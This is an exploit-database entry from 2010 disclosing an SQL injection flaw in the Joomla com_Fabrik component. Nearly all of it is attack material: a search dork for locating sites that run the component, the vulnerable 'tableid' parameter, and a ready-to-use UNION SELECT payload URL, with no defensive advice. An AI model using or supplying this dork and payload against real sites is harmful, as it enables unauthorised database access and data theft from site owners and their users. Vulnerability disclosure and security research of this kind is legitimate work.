id: 13775
date: 08/21/2010
title: Joomla Component com_Fabrik SQL Injection Vulnerability
author: Mkr0x
cves: 

=======================================================
Joomla Component com_Fabrik SQL Injection Vulnerability
=======================================================

$##################################################################$
# +==============================================================+ 
# | Joomla Component (com_Fabrik) SQL Injection Vulnerability  | 
# +==============================================================+ 
# Vendor : http://fabrikar.com/
# Author : Mkr0x                                            
# Home : www.kernel.ge
# E-mail : mkrcard@gmail.com
# Place : Georgia
$##################################################################$
# Dork : 
 index.php?option=com_fabrik
--
# Vulnerable : 
 http://[target]/index.php?option=com_fabrik&view=table&tableid=[SQL]
--
# Exploit : 
 http://[target]/index.php?option=com_fabrik&view=table&tableid=13+union+select+1--
--

 Best Regards 
  -Mkr0x-

# „Georgia has always been at the foreground“ .. 
$##################################################################$



#  0day.today [2023-03-23]  #